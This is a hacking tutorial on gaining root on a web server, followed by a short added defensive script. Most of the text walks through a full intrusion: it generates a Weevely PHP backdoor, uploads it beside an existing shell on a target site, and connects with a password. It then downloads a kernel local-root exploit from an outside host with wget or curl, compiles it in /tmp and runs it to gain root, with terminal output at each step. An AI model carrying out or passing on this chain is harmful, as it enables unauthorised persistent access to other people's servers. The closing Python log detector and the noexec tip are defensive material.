Today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all, open Weevely:
Menu > BackTrack > Maintaining Access > Web Backdoors > Weevely
Or
Open Terminal and type:
root@root: cd /pentest/backdoors/web/weevely
############################################################
Now let's make our backdoor by typing:
root@root:./main.py -g -o /root/Desktop/backdoor.php -p password
This command creates a backdoor called 'backdoor.php' with the password 'password'.
++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++
-g = Generate backdoor
-o = Output
-p = Password
-u = URL
-t = start Terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Steps:
Uploading our backdoor & connecting to it.
Checking the Kernel & Finding LocalR00t for it.
Compiling The LocalR00t
Executing..
###########################################################################
Let's start:
Open your shell and upload the backdoor:
The backdoor will be in the same location as the shell. For example:
http://www.target.com/uploads/shell.php <== shell
http://www.target.com/uploads/backdoor.php <== backdoor
Connect to the backdoor by typing:
./main.py -t -u http://www.target.com/uploads/backdoor.php -p password
root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright © 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method 'system()'.
+ Retrieving terminal basic environment variables .
[hacker@target.com/]
Now, to find the kernel version, type:
uname -a
[hacker@target.com/] uname -a
2.6.18 (example)
Now we have to find the localroot for that kernel on:
http://www.1337day.com
http://www.exploit-db.com
http://www.google.com
and some others..
Now we go to the /tmp/ directory, because it's always writable.
Let's say the kernel was 2.6.18.
There are a few ways to get the localroot onto the server:
uploading through shell
wget method
curl
Now let me explain how each method works:
Of course, you know how to upload through the shell.
wget
wget http://www.exploit.com/2.6.18.c
curl
curl http://www.exploit.com/2.6.18.c -o new_name
For this tutorial we will use wget.
############################################
[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget http://www.exploit.com/2.6.18.c
--2012-01-29 05:43:37-- http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'
0K ......... 208M=0s
2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
[hacker@target.com/tmp/]ls
2.6.18.c
file
file1
anything
#############################################
OK, now that the exploit is on the server, we have to compile it with this command:
gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]ls
2.6.18.c
file
file1
anything
zombie
++++++++++++++++
chmod 777 zombie
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 zombie
++++++++++++++++
executing..
++++++++++++++++
[hacker@target.com/tmp/]./zombie
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)
R00ted!
Hope you like it!
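
Seen from the server side, the steps above leave a clear trail in process-execution logs: a web-server account fetches a .c file into /tmp, compiles it, then runs the result. The following is an added example, not part of the original post, that flags that sequence. The record format, the account names and the sample lines are constructed assumptions; the file names are the ones used in this walkthrough.

```python
import shlex

WEB_USERS = {"www-data", "apache", "nginx"}   # assumed web-server accounts
FETCHERS = {"wget", "curl"}
COMPILERS = {"gcc", "cc"}

# Constructed records, one per line: "<epoch> <user> <cwd> <command line>"
SAMPLE = """\
1327815817 www-data /tmp wget http://www.exploit.com/2.6.18.c
1327815830 www-data /tmp gcc 2.6.18.c -o zombie
1327815835 www-data /tmp chmod 777 zombie
1327815840 www-data /tmp ./zombie
1327815900 deploy /home/deploy gcc app.c -o app
1327815950 www-data /var/www ls
"""

def detect(log, window=600):
    """Alert when a web account compiles code, and again when it runs the output."""
    state, alerts = {}, []          # state: (user, cwd) -> recent activity
    for line in log.strip().splitlines():
        ts, user, cwd, cmd = line.split(" ", 3)
        ts, argv = int(ts), shlex.split(cmd)
        if user not in WEB_USERS or not argv:
            continue                # only service accounts are of interest here
        s = state.setdefault((user, cwd), {"fetched": None, "out": None, "t": ts})
        if ts - s["t"] > window:    # stale activity: forget it
            s.update(fetched=None, out=None)
        s["t"] = ts
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in FETCHERS:        # remember the URL that was downloaded
            s["fetched"] = next((a for a in argv[1:] if "://" in a), None)
        elif prog in COMPILERS:     # a web account has no reason to compile code
            s["out"] = argv[argv.index("-o") + 1] if "-o" in argv[:-1] else "a.out"
            alerts.append({"ts": ts, "user": user, "cwd": cwd, "rule": "compile",
                           "after_fetch": s["fetched"]})
        elif argv[0].startswith("./") and prog == s["out"]:
            alerts.append({"ts": ts, "user": user, "cwd": cwd, "rule": "run-compiled",
                           "binary": prog})
            s.update(fetched=None, out=None)
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The same chain also fails outright when /tmp is mounted noexec and no compiler is installed on the web host.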